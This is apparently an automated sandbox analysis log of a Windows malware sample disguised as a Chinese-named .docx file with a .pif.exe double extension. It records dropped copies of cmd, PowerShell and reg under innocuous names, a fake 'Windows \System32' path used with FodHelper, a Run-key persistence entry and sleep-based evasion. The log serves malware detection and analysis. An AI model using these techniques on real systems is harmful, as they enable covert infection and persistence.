              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe Section loaded: ???.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe Section loaded: ??l.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe Section loaded: ?.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe Section loaded: ????.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe Section loaded: ???e???????????.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
              Source: C:\Windows\SysWOW64\colorcpl.exe Window found: window name: SysTabControl32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\colorcpl.exe Window detected: Number of UI elements: 12
              Source: C:\Users\Public\xkn.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: C:\Windows \System32\per.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe Static file information: File size 1085440 > 1048576
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: FodHelper.pdb source: extrac32.exe, 00000012.00000002.1282544160.000001FCCC830000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000022.00000002.1389829508.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe, 00000022.00000000.1363110246.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe.18.dr
              Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000008.00000000.1264413808.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000000.1266008004.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000002.1267795392.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000000.1268349543.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000002.1277417828.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000000.1277719216.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000002.1280383467.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000002.1284778384.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000000.1280701556.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000002.1361948594.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000000.1285093557.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000000.1301865429.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000002.1305805578.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000000.1390985382.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000002.1397949450.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000002.1415158264.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000000.1400142537.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe.6.dr
              Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000016.00000000.1285526824.00007FF6C891A000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.15.dr
              Source: Binary string: easinvoker.pdbH source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: reg.pdb source: extrac32.exe, 0000000D.00000002.1276914690.00000178283A0000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000018.00000002.1302899439.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000018.00000000.1302258700.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.13.dr
              Source: Binary string: powershell.pdb source: xkn.exe, 00000016.00000000.1285526824.00007FF6C891A000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.15.dr
              Source: Binary string: cmd.pdb source: alpha.exe, 00000008.00000000.1264413808.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000000.1266008004.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000002.1267795392.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000000.1268349543.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000002.1277417828.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000000.1277719216.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000002.1280383467.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000002.1284778384.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000000.1280701556.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000002.1361948594.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000000.1285093557.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000000.1301865429.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000002.1305805578.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000000.1390985382.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000002.1397949450.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000002.1415158264.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000000.1400142537.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe.6.dr
              Source: Binary string: FodHelper.pdbGCTL source: extrac32.exe, 00000012.00000002.1282544160.000001FCCC830000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000022.00000002.1389829508.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe, 00000022.00000000.1363110246.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe.18.dr
              Source: Binary string: reg.pdbGCTL source: extrac32.exe, 0000000D.00000002.1276914690.00000178283A0000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000018.00000002.1302899439.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000018.00000000.1302258700.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.13.dr

              Data Obfuscation

              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Unpacked PE file: 3.2.drbdmeyP.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs . :EW;. :EW;. :R;. :W;. :W;. :W;
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Unpacked PE file: 0.2.#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe.2980000.1.unpack
              Source: Yara match | File source: 0.2.#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe.2980000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe.2980000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: drbdmeyP.pif.0.dr | Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02997CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 0_2_02997CC8
              Source: alpha.exe.6.dr | Static PE information: section name: .didat
              Source: per.exe.18.dr | Static PE information: section name: .imrsiv
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029832FC push eax; ret 0_2_02983338
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029AA2FC push 029AA367h; ret 0_2_029AA35F
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299D2E4 push ecx; mov dword ptr [esp], edx 0_2_0299D2E9
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0298635A push 029863B7h; ret 0_2_029863AF
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0298635C push 029863B7h; ret 0_2_029863AF
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029AA0AC push 029AA125h; ret 0_2_029AA11D
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029AA1F8 push 029AA288h; ret 0_2_029AA280
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029AA144 push 029AA1ECh; ret 0_2_029AA1E4
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02986748 push 0298678Ah; ret 0_2_02986782
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02986746 push 0298678Ah; ret 0_2_02986782
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0298C4FC push ecx; mov dword ptr [esp], edx 0_2_0298C501
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0298D530 push 0298D55Ch; ret 0_2_0298D554
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0298CB7C push 0298CD02h; ret 0_2_0298CCFA
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299789C push 02997919h; ret 0_2_02997911
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0298C8AA push 0298CD02h; ret 0_2_0298CCFA
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029968D8 push 02996983h; ret 0_2_0299697B
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029968D6 push 02996983h; ret 0_2_0299697B
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029A9874 push 029A9A60h; ret 0_2_029A9A58
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029ADE98 push eax; ret 0_2_029ADF68
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02999EBB push 02999EF4h; ret 0_2_02999EEC
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02999EBC push 02999EF4h; ret 0_2_02999EEC
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02992EF0 push 02992F66h; ret 0_2_02992F5E
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02995E0C push ecx; mov dword ptr [esp], edx 0_2_02995E0E
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02992FFB push 02993049h; ret 0_2_02993041
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02992FFC push 02993049h; ret 0_2_02993041
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02997F18 push 02997F50h; ret 0_2_02997F48
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02997C7C push 02997CBEh; ret 0_2_02997CB6
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_00419935 push edx; iretd 3_2_00419949
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_00419A3E push eax; ret 3_2_00419A41
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_00414324 push cs; iretd 3_2_004143FA
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_00414426 push cs; iretd 3_2_004143FA

              Persistence and Installation Behavior

              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | File created: C:\Users\Public\Libraries\drbdmeyP.pif
              Source: C:\Windows\SysWOW64\extrac32.exe | File created: C:\Users\Public\Libraries\Pyemdbrd.PIF
              Source: C:\Windows\System32\cmd.exe | Executable created and started: C:\Windows \System32\per.exe
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_04586EB0 ShellExecuteW,URLDownloadToFileW, 31_2_04586EB0
              Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\alpha.exe
              Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\xkn.exe
              Source: C:\Windows\System32\extrac32.exe | File created: C:\Windows \System32\per.exe
              Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\ger.exe

              Boot Survival

              Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\alpha.exe
              Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\xkn.exe
              Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\ger.exe
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0459AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 31_2_0459AA4A
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Pyemdbrd

              Hooking and other Techniques for Hiding and Protection

              Source: Possible double extension: docx.pif | Static PE information: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02999EF8 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_02999EF8
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\alpha.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\colorcpl.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\taskkill.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299CD74 0_2_0299CD74
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0458F7A7 Sleep,ExitProcess, 31_2_0458F7A7
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_0-32948
              Source: C:\Windows\SysWOW64\colorcpl.exe | File opened: \Device\RasAcd count: 191293
              Source: c:\users\public\xkn.exe | Key value queried: Powershell behavior
              Source: C:\Users\Public\xkn.exe | Memory allocated: 1EC81490000 memory reserve | memory write watch
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 31_2_0459A748
              Source: C:\Users\Public\xkn.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Window / User API: threadDelayed 389
              Source: C:\Users\Public\xkn.exe | Window / User API: threadDelayed 2191
              Source: C:\Users\Public\xkn.exe | Window / User API: threadDelayed 974
              Source: C:\Windows\SysWOW64\colorcpl.exe | Window / User API: threadDelayed 1561
              Source: C:\Windows\SysWOW64\colorcpl.exe | Window / User API: threadDelayed 493
              Source: C:\Windows\SysWOW64\colorcpl.exe | Window / User API: threadDelayed 693
              Source: C:\Windows\SysWOW64\colorcpl.exe | Window / User API: foregroundWindowGot 1697
              Source: C:\Users\Public\alpha.exe | API coverage: 6.3 %
              Source: C:\Users\Public\alpha.exe | API coverage: 6.4 %
              Source: C:\Users\Public\alpha.exe | API coverage: 8.1 %
              Source: C:\Users\Public\alpha.exe | API coverage: 8.3 %
              Source: C:\Users\Public\alpha.exe | API coverage: 8.3 %
              Source: C:\Windows\SysWOW64\colorcpl.exe | API coverage: 9.9 %
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299CD74 0_2_0299CD74
              Source: C:\Users\Public\Libraries\drbdmeyP.pif TID: 1312 | Thread sleep count: 389 > 30
              Source: C:\Users\Public\xkn.exe TID: 7316 | Thread sleep count: 2191 > 30
              Source: C:\Users\Public\xkn.exe TID: 7316 | Thread sleep count: 974 > 30
              Source: C:\Users\Public\xkn.exe TID: 7268 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8036 | Thread sleep time: -42500s >= -30000s
              Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8040 | Thread sleep time: -4683000s >= -30000s
              Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8024 | Thread sleep time: -493000s >= -30000s
              Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8024 | Thread sleep time: -258000s >= -30000s
              Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8040 | Thread sleep time: -2079000s >= -30000s
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_029858B4
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 8_2_00007FF64B572978
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose, 8_2_00007FF64B587B4C
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 8_2_00007FF64B57823C
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 8_2_00007FF64B561560
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,8_2_00007FF64B5635B8
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF64B572978
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF64B587B4C
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF64B57823C
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF64B561560
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF64B5635B8
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,12_2_00007FF64B57823C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,12_2_00007FF64B572978
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,12_2_00007FF64B587B4C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,12_2_00007FF64B561560
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,12_2_00007FF64B5635B8
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,14_2_00007FF64B57823C
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,14_2_00007FF64B572978
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,14_2_00007FF64B587B4C
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,14_2_00007FF64B561560
